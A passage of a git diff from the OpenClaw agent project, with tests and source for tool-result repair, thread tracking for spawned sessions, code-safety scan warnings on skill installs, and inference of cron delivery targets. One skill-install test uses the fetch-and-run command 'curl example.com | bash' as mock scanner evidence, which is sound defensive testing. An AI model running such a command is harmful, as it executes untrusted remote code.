{ role: "user", content: "retrying after abort" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// Should NOT add synthetic tool results for aborted messages
|
||||
expect(result.added).toHaveLength(0);
|
||||
// Messages should be passed through without synthetic insertions
|
||||
expect(result.messages).toHaveLength(2);
|
||||
expect(result.messages[0]?.role).toBe("assistant");
|
||||
expect(result.messages[1]?.role).toBe("user");
|
||||
});
|
||||
|
||||
it("still repairs tool results for normal assistant messages with stopReason 'toolUse'", () => {
|
||||
// Normal tool calls (stopReason: "toolUse" or "stop") should still be repaired
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_normal", name: "read", arguments: {} }],
|
||||
stopReason: "toolUse",
|
||||
},
|
||||
{ role: "user", content: "user message" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// Should add a synthetic tool result for the missing result
|
||||
expect(result.added).toHaveLength(1);
|
||||
expect(result.added[0]?.toolCallId).toBe("call_normal");
|
||||
});
|
||||
|
||||
it("drops orphan tool results that follow an aborted assistant message", () => {
|
||||
// When an assistant message is aborted, any tool results that follow should be
|
||||
// dropped as orphans (since we skip extracting tool calls from aborted messages).
|
||||
// This addresses the edge case where a partial tool result was persisted before abort.
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_aborted", name: "exec", arguments: {} }],
|
||||
stopReason: "aborted",
|
||||
},
|
||||
{
|
||||
role: "toolResult",
|
||||
toolCallId: "call_aborted",
|
||||
toolName: "exec",
|
||||
content: [{ type: "text", text: "partial result" }],
|
||||
isError: false,
|
||||
},
|
||||
{ role: "user", content: "retrying" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// The orphan tool result should be dropped
|
||||
expect(result.droppedOrphanCount).toBe(1);
|
||||
expect(result.messages).toHaveLength(2);
|
||||
expect(result.messages[0]?.role).toBe("assistant");
|
||||
expect(result.messages[1]?.role).toBe("user");
|
||||
// No synthetic results should be added
|
||||
expect(result.added).toHaveLength(0);
|
||||
});
|
||||
});
|
||||
|
||||
describe("sanitizeToolCallInputs", () => {
|
||||
|
||||
@@ -213,6 +213,19 @@ export function repairToolUseResultPairing(messages: AgentMessage[]): ToolUseRep
|
||||
}
|
||||
|
||||
const assistant = msg as Extract<AgentMessage, { role: "assistant" }>;
|
||||
|
||||
// Skip tool call extraction for aborted or errored assistant messages.
|
||||
// When stopReason is "error" or "aborted", the tool_use blocks may be incomplete
|
||||
// (e.g., partialJson: true) and should not have synthetic tool_results created.
|
||||
// Creating synthetic results for incomplete tool calls causes API 400 errors:
|
||||
// "unexpected tool_use_id found in tool_result blocks"
|
||||
// See: https://github.com/openclaw/openclaw/issues/4597
|
||||
const stopReason = (assistant as { stopReason?: string }).stopReason;
|
||||
if (stopReason === "error" || stopReason === "aborted") {
|
||||
out.push(msg);
|
||||
continue;
|
||||
}
|
||||
|
||||
const toolCalls = extractToolCallsFromAssistant(assistant);
|
||||
if (toolCalls.length === 0) {
|
||||
out.push(msg);
|
||||
|
||||
99
src/agents/sessions-spawn-threadid.test.ts
Normal file
99
src/agents/sessions-spawn-threadid.test.ts
Normal file
@@ -0,0 +1,99 @@
|
||||
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||
|
||||
const callGatewayMock = vi.fn();
|
||||
vi.mock("../gateway/call.js", () => ({
|
||||
callGateway: (opts: unknown) => callGatewayMock(opts),
|
||||
}));
|
||||
|
||||
let configOverride: ReturnType<(typeof import("../config/config.js"))["loadConfig"]> = {
|
||||
session: {
|
||||
mainKey: "main",
|
||||
scope: "per-sender",
|
||||
},
|
||||
};
|
||||
|
||||
vi.mock("../config/config.js", async (importOriginal) => {
|
||||
const actual = await importOriginal<typeof import("../config/config.js")>();
|
||||
return {
|
||||
...actual,
|
||||
loadConfig: () => configOverride,
|
||||
resolveGatewayPort: () => 18789,
|
||||
};
|
||||
});
|
||||
|
||||
import "./test-helpers/fast-core-tools.js";
|
||||
import { createOpenClawTools } from "./openclaw-tools.js";
|
||||
import {
|
||||
listSubagentRunsForRequester,
|
||||
resetSubagentRegistryForTests,
|
||||
} from "./subagent-registry.js";
|
||||
|
||||
// Verifies that sessions_spawn records where the request came from (channel, recipient and
// optional thread id) on the subagent run it registers.
describe("sessions_spawn requesterOrigin threading", () => {
  type ToolOptions = Parameters<typeof createOpenClawTools>[0];

  /**
   * Builds the tool set for `options`, runs sessions_spawn once and returns the runs
   * registered for the "main" requester.
   */
  const spawnAndListRuns = async (options: ToolOptions) => {
    const spawnTool = createOpenClawTools(options).find(({ name }) => name === "sessions_spawn");
    if (!spawnTool) {
      throw new Error("missing sessions_spawn tool");
    }
    await spawnTool.execute("call", {
      task: "do thing",
      runTimeoutSeconds: 1,
    });
    return listSubagentRunsForRequester("main");
  };

  beforeEach(() => {
    resetSubagentRegistryForTests();
    callGatewayMock.mockReset();
    configOverride = {
      session: {
        mainKey: "main",
        scope: "per-sender",
      },
    };

    callGatewayMock.mockImplementation(async (opts: unknown) => {
      switch ((opts as { method?: string }).method) {
        case "agent":
          return { runId: "run-1", status: "accepted", acceptedAt: 1 };
        case "agent.wait":
          // Prevent background announce flow by returning a non-terminal status.
          return { runId: "run-1", status: "running" };
        default:
          return {};
      }
    });
  });

  it("captures threadId in requesterOrigin", async () => {
    const runs = await spawnAndListRuns({
      agentSessionKey: "main",
      agentChannel: "telegram",
      agentTo: "telegram:123",
      agentThreadId: 42,
    });

    expect(runs).toHaveLength(1);
    expect(runs[0]?.requesterOrigin).toMatchObject({
      channel: "telegram",
      to: "telegram:123",
      threadId: 42,
    });
  });

  it("stores requesterOrigin without threadId when none is provided", async () => {
    const runs = await spawnAndListRuns({
      agentSessionKey: "main",
      agentChannel: "telegram",
      agentTo: "telegram:123",
    });

    expect(runs).toHaveLength(1);
    expect(runs[0]?.requesterOrigin?.threadId).toBeUndefined();
  });
});
|
||||
114
src/agents/skills-install.test.ts
Normal file
114
src/agents/skills-install.test.ts
Normal file
@@ -0,0 +1,114 @@
|
||||
import fs from "node:fs/promises";
|
||||
import os from "node:os";
|
||||
import path from "node:path";
|
||||
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||
import { installSkill } from "./skills-install.js";
|
||||
|
||||
const runCommandWithTimeoutMock = vi.fn();
|
||||
const scanDirectoryWithSummaryMock = vi.fn();
|
||||
|
||||
vi.mock("../process/exec.js", () => ({
|
||||
runCommandWithTimeout: (...args: unknown[]) => runCommandWithTimeoutMock(...args),
|
||||
}));
|
||||
|
||||
vi.mock("../security/skill-scanner.js", async (importOriginal) => {
|
||||
const actual = await importOriginal<typeof import("../security/skill-scanner.js")>();
|
||||
return {
|
||||
...actual,
|
||||
scanDirectoryWithSummary: (...args: unknown[]) => scanDirectoryWithSummaryMock(...args),
|
||||
};
|
||||
});
|
||||
|
||||
/**
 * Creates `<workspaceDir>/skills/<name>` containing a SKILL.md whose front matter declares a
 * single node installer with id "deps", plus an empty `runner.js` module.
 *
 * @param workspaceDir - Workspace root under which the `skills` directory is created.
 * @param name - Skill name; used as the directory name and inside SKILL.md.
 * @returns The path of the created skill directory.
 */
async function writeInstallableSkill(workspaceDir: string, name: string): Promise<string> {
  const skillDir = path.join(workspaceDir, "skills", name);
  const manifestPath = path.join(skillDir, "SKILL.md");
  const runnerPath = path.join(skillDir, "runner.js");
  const manifest = `---
name: ${name}
description: test skill
metadata: {"openclaw":{"install":[{"id":"deps","kind":"node","package":"example-package"}]}}
---

# ${name}
`;

  await fs.mkdir(skillDir, { recursive: true });
  await fs.writeFile(manifestPath, manifest, "utf-8");
  await fs.writeFile(runnerPath, "export {};\n", "utf-8");
  return skillDir;
}
|
||||
|
||||
// Verifies that installSkill surfaces code-scan results as warnings without blocking the install.
describe("installSkill code safety scanning", () => {
  /** Runs `body` against a fresh temporary workspace and removes it afterwards (best effort). */
  async function withTempWorkspace(body: (workspaceDir: string) => Promise<void>): Promise<void> {
    const workspaceDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-skills-install-"));
    try {
      await body(workspaceDir);
    } finally {
      await fs.rm(workspaceDir, { recursive: true, force: true }).catch(() => undefined);
    }
  }

  /** True when any warning contains `needle`; undefined when there is no warnings list at all. */
  const hasWarning = (warnings: string[] | undefined, needle: string): boolean | undefined =>
    warnings?.some((warning) => warning.includes(needle));

  beforeEach(() => {
    runCommandWithTimeoutMock.mockReset();
    scanDirectoryWithSummaryMock.mockReset();
    // The install command itself always succeeds; only the scanner outcome varies per test.
    runCommandWithTimeoutMock.mockResolvedValue({
      code: 0,
      stdout: "ok",
      stderr: "",
      signal: null,
      killed: false,
    });
  });

  it("adds detailed warnings for critical findings and continues install", async () => {
    await withTempWorkspace(async (workspaceDir) => {
      const skillDir = await writeInstallableSkill(workspaceDir, "danger-skill");
      const criticalFinding = {
        ruleId: "dangerous-exec",
        severity: "critical",
        file: path.join(skillDir, "runner.js"),
        line: 1,
        message: "Shell command execution detected (child_process)",
        evidence: 'exec("curl example.com | bash")',
      };
      scanDirectoryWithSummaryMock.mockResolvedValue({
        scannedFiles: 1,
        critical: 1,
        warn: 0,
        info: 0,
        findings: [criticalFinding],
      });

      const result = await installSkill({
        workspaceDir,
        skillName: "danger-skill",
        installId: "deps",
      });

      expect(result.ok).toBe(true);
      expect(hasWarning(result.warnings, "dangerous code patterns")).toBe(true);
      expect(hasWarning(result.warnings, "runner.js:1")).toBe(true);
    });
  });

  it("warns and continues when skill scan fails", async () => {
    await withTempWorkspace(async (workspaceDir) => {
      await writeInstallableSkill(workspaceDir, "scanfail-skill");
      scanDirectoryWithSummaryMock.mockRejectedValue(new Error("scanner exploded"));

      const result = await installSkill({
        workspaceDir,
        skillName: "scanfail-skill",
        installId: "deps",
      });

      expect(result.ok).toBe(true);
      expect(hasWarning(result.warnings, "code safety scan failed")).toBe(true);
      expect(hasWarning(result.warnings, "Installation continues")).toBe(true);
    });
  });
});
|
||||
@@ -7,6 +7,7 @@ import type { OpenClawConfig } from "../config/config.js";
|
||||
import { resolveBrewExecutable } from "../infra/brew.js";
|
||||
import { fetchWithSsrFGuard } from "../infra/net/fetch-guard.js";
|
||||
import { runCommandWithTimeout } from "../process/exec.js";
|
||||
import { scanDirectoryWithSummary } from "../security/skill-scanner.js";
|
||||
import { CONFIG_DIR, ensureDir, resolveUserPath } from "../utils.js";
|
||||
import {
|
||||
hasBinary,
|
||||
@@ -32,6 +33,7 @@ export type SkillInstallResult = {
|
||||
stdout: string;
|
||||
stderr: string;
|
||||
code: number | null;
|
||||
warnings?: string[];
|
||||
};
|
||||
|
||||
function isNodeReadableStream(value: unknown): value is NodeJS.ReadableStream {
|
||||
@@ -77,6 +79,57 @@ function formatInstallFailureMessage(result: {
|
||||
return `Install failed (${code}): ${summary}`;
|
||||
}
|
||||
|
||||
/**
 * Attaches scan warnings to an install result.
 *
 * @param result - The install result to decorate.
 * @param warnings - Warnings collected for this install attempt.
 * @returns `result` itself when there are no warnings; otherwise a shallow copy of `result`
 *   whose `warnings` field is a fresh copy of the given list.
 */
function withWarnings(result: SkillInstallResult, warnings: string[]): SkillInstallResult {
  // Without warnings the original object is returned as-is, so no `warnings` key is introduced.
  return warnings.length > 0 ? { ...result, warnings: [...warnings] } : result;
}
|
||||
|
||||
/**
 * Formats one scan finding as `<message> (<path>:<line>)`.
 *
 * The path is shown relative to `rootDir` when the file lies inside it; otherwise only the
 * file's base name is shown.
 *
 * @param rootDir - Directory the finding's path is made relative to.
 * @param finding - Finding with its message, file path and line number.
 * @returns The formatted detail string.
 */
function formatScanFindingDetail(
  rootDir: string,
  finding: { message: string; file: string; line: number },
): string {
  const relativePath = path.relative(rootDir, finding.file);
  // Only a leading ".." path segment means the file is outside rootDir; a name that merely
  // begins with two dots (e.g. "..hidden/x.js") is still inside. path.relative can also return
  // an absolute path (different Windows drives), which is outside the root as well.
  const escapesRoot =
    relativePath === ".." ||
    relativePath.startsWith(`..${path.sep}`) ||
    path.isAbsolute(relativePath);
  const insideRoot = relativePath !== "" && relativePath !== "." && !escapesRoot;
  const filePath = insideRoot ? relativePath : path.basename(finding.file);
  return `${finding.message} (${filePath}:${finding.line})`;
}
|
||||
|
||||
/**
 * Scans the skill's base directory and turns the scan summary into user-facing warnings.
 *
 * - Any critical finding: one warning listing every critical finding with its location.
 * - Otherwise, any warn-level finding: one warning with the count only.
 * - Scan failure: one warning saying the scan failed; the error is not rethrown.
 *
 * @param entry - Skill entry whose `skill.baseDir` is scanned.
 * @returns Zero or one warning strings.
 */
async function collectSkillInstallScanWarnings(entry: SkillEntry): Promise<string[]> {
  const skillName = entry.skill.name;
  const skillDir = path.resolve(entry.skill.baseDir);

  try {
    const report = await scanDirectoryWithSummary(skillDir);

    if (report.critical > 0) {
      const details: string[] = [];
      for (const finding of report.findings) {
        if (finding.severity === "critical") {
          details.push(formatScanFindingDetail(skillDir, finding));
        }
      }
      return [
        `WARNING: Skill "${skillName}" contains dangerous code patterns: ${details.join("; ")}`,
      ];
    }

    if (report.warn > 0) {
      return [
        `Skill "${skillName}" has ${report.warn} suspicious code pattern(s). Run "openclaw security audit --deep" for details.`,
      ];
    }

    return [];
  } catch (err) {
    // Scanning is advisory: a scanner failure is reported as a warning, not an install error.
    return [
      `Skill "${skillName}" code safety scan failed (${String(err)}). Installation continues; run "openclaw security audit --deep" after install.`,
    ];
  }
}
|
||||
|
||||
/**
 * Resolves the identifier used to select an install spec.
 *
 * @param spec - Install spec; its optional `id` is preferred when it has visible characters.
 * @param index - Position of the spec in its list, used to build the fallback id.
 * @returns The trimmed explicit id, or `<kind>-<index>` when the id is missing, empty or
 *   whitespace-only.
 */
function resolveInstallId(spec: SkillInstallSpec, index: number): string {
  // Trim before deciding on the fallback: `??` alone would accept "" or "   " and yield an
  // empty identifier instead of the index-based one.
  const explicitId = spec.id?.trim();
  return explicitId ? explicitId : `${spec.kind}-${index}`.trim();
}
|
||||
@@ -356,40 +409,51 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
}
|
||||
|
||||
const spec = findInstallSpec(entry, params.installId);
|
||||
const warnings = await collectSkillInstallScanWarnings(entry);
|
||||
if (!spec) {
|
||||
return {
|
||||
ok: false,
|
||||
message: `Installer not found: ${params.installId}`,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: `Installer not found: ${params.installId}`,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
if (spec.kind === "download") {
|
||||
return await installDownloadSpec({ entry, spec, timeoutMs });
|
||||
const downloadResult = await installDownloadSpec({ entry, spec, timeoutMs });
|
||||
return withWarnings(downloadResult, warnings);
|
||||
}
|
||||
|
||||
const prefs = resolveSkillsInstallPreferences(params.config);
|
||||
const command = buildInstallCommand(spec, prefs);
|
||||
if (command.error) {
|
||||
return {
|
||||
ok: false,
|
||||
message: command.error,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: command.error,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
|
||||
const brewExe = hasBinary("brew") ? "brew" : resolveBrewExecutable();
|
||||
if (spec.kind === "brew" && !brewExe) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "brew not installed",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "brew not installed",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
if (spec.kind === "uv" && !hasBinary("uv")) {
|
||||
if (brewExe) {
|
||||
@@ -397,32 +461,41 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
timeoutMs,
|
||||
});
|
||||
if (brewResult.code !== 0) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "Failed to install uv (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "Failed to install uv (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
} else {
|
||||
return {
|
||||
ok: false,
|
||||
message: "uv not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "uv not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
}
|
||||
if (!command.argv || command.argv.length === 0) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "invalid install command",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "invalid install command",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
|
||||
if (spec.kind === "brew" && brewExe && command.argv[0] === "brew") {
|
||||
@@ -435,22 +508,28 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
timeoutMs,
|
||||
});
|
||||
if (brewResult.code !== 0) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "Failed to install go (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "Failed to install go (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
} else {
|
||||
return {
|
||||
ok: false,
|
||||
message: "go not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "go not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -479,11 +558,14 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
})();
|
||||
|
||||
const success = result.code === 0;
|
||||
return {
|
||||
ok: success,
|
||||
message: success ? "Installed" : formatInstallFailureMessage(result),
|
||||
stdout: result.stdout.trim(),
|
||||
stderr: result.stderr.trim(),
|
||||
code: result.code,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: success,
|
||||
message: success ? "Installed" : formatInstallFailureMessage(result),
|
||||
stdout: result.stdout.trim(),
|
||||
stderr: result.stderr.trim(),
|
||||
code: result.code,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
|
||||
@@ -198,6 +198,85 @@ describe("subagent announce formatting", () => {
|
||||
expect(call?.params?.accountId).toBe("kev");
|
||||
});
|
||||
|
||||
it("includes threadId when origin has an active topic/thread", async () => {
|
||||
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
|
||||
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
|
||||
embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
|
||||
sessionStore = {
|
||||
"agent:main:main": {
|
||||
sessionId: "session-thread",
|
||||
lastChannel: "telegram",
|
||||
lastTo: "telegram:123",
|
||||
lastThreadId: 42,
|
||||
queueMode: "collect",
|
||||
queueDebounceMs: 0,
|
||||
},
|
||||
};
|
||||
|
||||
const didAnnounce = await runSubagentAnnounceFlow({
|
||||
childSessionKey: "agent:main:subagent:test",
|
||||
childRunId: "run-thread",
|
||||
requesterSessionKey: "main",
|
||||
requesterDisplayKey: "main",
|
||||
task: "do thing",
|
||||
timeoutMs: 1000,
|
||||
cleanup: "keep",
|
||||
waitForCompletion: false,
|
||||
startedAt: 10,
|
||||
endedAt: 20,
|
||||
outcome: { status: "ok" },
|
||||
});
|
||||
|
||||
expect(didAnnounce).toBe(true);
|
||||
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
|
||||
|
||||
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
|
||||
expect(call?.params?.channel).toBe("telegram");
|
||||
expect(call?.params?.to).toBe("telegram:123");
|
||||
expect(call?.params?.threadId).toBe("42");
|
||||
});
|
||||
|
||||
it("prefers requesterOrigin.threadId over session entry threadId", async () => {
|
||||
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
|
||||
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
|
||||
embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
|
||||
sessionStore = {
|
||||
"agent:main:main": {
|
||||
sessionId: "session-thread-override",
|
||||
lastChannel: "telegram",
|
||||
lastTo: "telegram:123",
|
||||
lastThreadId: 42,
|
||||
queueMode: "collect",
|
||||
queueDebounceMs: 0,
|
||||
},
|
||||
};
|
||||
|
||||
const didAnnounce = await runSubagentAnnounceFlow({
|
||||
childSessionKey: "agent:main:subagent:test",
|
||||
childRunId: "run-thread-override",
|
||||
requesterSessionKey: "main",
|
||||
requesterDisplayKey: "main",
|
||||
requesterOrigin: {
|
||||
channel: "telegram",
|
||||
to: "telegram:123",
|
||||
threadId: 99,
|
||||
},
|
||||
task: "do thing",
|
||||
timeoutMs: 1000,
|
||||
cleanup: "keep",
|
||||
waitForCompletion: false,
|
||||
startedAt: 10,
|
||||
endedAt: 20,
|
||||
outcome: { status: "ok" },
|
||||
});
|
||||
|
||||
expect(didAnnounce).toBe(true);
|
||||
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
|
||||
|
||||
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
|
||||
expect(call?.params?.threadId).toBe("99");
|
||||
});
|
||||
|
||||
it("splits collect-mode queues when accountId differs", async () => {
|
||||
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
|
||||
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
|
||||
|
||||
@@ -233,4 +233,97 @@ describe("cron tool", () => {
|
||||
expect(call.method).toBe("cron.add");
|
||||
expect(call.params?.agentId).toBeNull();
|
||||
});
|
||||
|
||||
it("infers delivery from threaded session keys", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({
|
||||
agentSessionKey: "agent:main:slack:channel:general:thread:1699999999.0001",
|
||||
});
|
||||
await tool.execute("call-thread", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({
|
||||
mode: "announce",
|
||||
channel: "slack",
|
||||
to: "general",
|
||||
});
|
||||
});
|
||||
|
||||
it("preserves telegram forum topics when inferring delivery", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({
|
||||
agentSessionKey: "agent:main:telegram:group:-1001234567890:topic:99",
|
||||
});
|
||||
await tool.execute("call-telegram-topic", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({
|
||||
mode: "announce",
|
||||
channel: "telegram",
|
||||
to: "-1001234567890:topic:99",
|
||||
});
|
||||
});
|
||||
|
||||
it("infers delivery when delivery is null", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({ agentSessionKey: "agent:main:dm:alice" });
|
||||
await tool.execute("call-null-delivery", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
delivery: null,
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({
|
||||
mode: "announce",
|
||||
to: "alice",
|
||||
});
|
||||
});
|
||||
|
||||
it("does not infer delivery when mode is none", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({ agentSessionKey: "agent:main:discord:dm:buddy" });
|
||||
await tool.execute("call-none", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
delivery: { mode: "none" },
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({ mode: "none" });
|
||||
});
|
||||
});
|
||||
|
||||
@@ -1,6 +1,8 @@
|
||||
import { Type } from "@sinclair/typebox";
|
||||
import type { CronDelivery, CronMessageChannel } from "../../cron/types.js";
|
||||
import { loadConfig } from "../../config/config.js";
|
||||
import { normalizeCronJobCreate, normalizeCronJobPatch } from "../../cron/normalize.js";
|
||||
import { parseAgentSessionKey } from "../../sessions/session-key-utils.js";
|
||||
import { truncateUtf16Safe } from "../../utils.js";
|
||||
import { resolveSessionAgentId } from "../agent-scope.js";
|
||||
import { optionalStringEnum, stringEnum } from "../schema/typebox.js";
|
||||
@@ -153,6 +155,72 @@ async function buildReminderContextLines(params: {
|
||||
}
|
||||
}
|
||||
|
||||
/** Type guard: true for non-null objects that are not arrays. */
function isRecord(value: unknown): value is Record<string, unknown> {
  if (value === null || typeof value !== "object") {
    return false;
  }
  return !Array.isArray(value);
}
|
||||
|
||||
/**
 * Removes the last `:thread:<id>` suffix (matched case-insensitively) from a session key.
 *
 * @param sessionKey - Session key that may end in a thread suffix.
 * @returns The part before the last `:thread:` marker, trimmed. The key is returned unchanged
 *   when there is no marker, when the marker is at the very start, or when the remaining
 *   parent part would be empty.
 */
function stripThreadSuffixFromSessionKey(sessionKey: string): string {
  // Search the original string directly. Lowercasing first and reusing the index is unsafe
  // because toLowerCase() can change the string's length (e.g. U+0130 becomes two code units).
  const marker = /:thread:/gi;
  let idx = -1;
  for (let hit = marker.exec(sessionKey); hit !== null; hit = marker.exec(sessionKey)) {
    idx = hit.index;
    // Resume one character later so markers sharing a colon (":thread:thread:") are all seen.
    marker.lastIndex = hit.index + 1;
  }
  if (idx <= 0) {
    return sessionKey;
  }
  const parent = sessionKey.slice(0, idx).trim();
  return parent ? parent : sessionKey;
}
|
||||
|
||||
/**
 * Derives an "announce" delivery target from an agent session key.
 *
 * @param agentSessionKey - Session key of the agent creating the job.
 * @returns A delivery with `to` set to the peer id (and `channel` when the key carries one),
 *   or null when the key is empty, cannot be parsed, belongs to a main/subagent/acp session,
 *   or has no dm/group/channel marker followed by a peer id.
 */
function inferDeliveryFromSessionKey(agentSessionKey?: string): CronDelivery | null {
  const rawSessionKey = agentSessionKey?.trim();
  if (!rawSessionKey) {
    return null;
  }

  // Threaded sessions append :thread:<id>, which we strip so delivery targets the parent peer.
  const parsed = parseAgentSessionKey(stripThreadSuffixFromSessionKey(rawSessionKey));
  if (!parsed || !parsed.rest) {
    return null;
  }

  const segments = parsed.rest.split(":").filter(Boolean);
  if (segments.length === 0) {
    return null;
  }

  const nonPeerHeads = new Set(["main", "subagent", "acp"]);
  const head = segments[0]?.trim().toLowerCase();
  if (!head || nonPeerHeads.has(head)) {
    return null;
  }

  // buildAgentPeerSessionKey encodes peers as:
  // - dm:<peerId>
  // - <channel>:dm:<peerId>
  // - <channel>:<accountId>:dm:<peerId>
  // - <channel>:group:<peerId>
  // - <channel>:channel:<peerId>
  // NOTE: Telegram forum topics encode as <chatId>:topic:<topicId> and should be preserved.
  const peerMarkers = new Set(["dm", "group", "channel"]);
  const markerIndex = segments.findIndex((segment) => peerMarkers.has(segment));
  if (markerIndex === -1) {
    return null;
  }

  // Everything after the marker is the peer id, including any further ":"-separated parts.
  const peerId = segments
    .slice(markerIndex + 1)
    .join(":")
    .trim();
  if (!peerId) {
    return null;
  }

  // A marker in first position means the key has no channel prefix ("dm:<peerId>").
  if (markerIndex < 1) {
    return { mode: "announce", to: peerId };
  }
  return { mode: "announce", to: peerId, channel: head as CronMessageChannel };
}
|
||||
|
||||
export function createCronTool(opts?: CronToolOptions): AnyAgentTool {
|
||||
return {
|
||||
label: "Cron",
|
||||
@@ -243,6 +311,35 @@ Use jobId as the canonical identifier; id is accepted for compatibility. Use con
|
||||
(job as { agentId?: string }).agentId = agentId;
|
||||
}
|
||||
}
|
||||
|
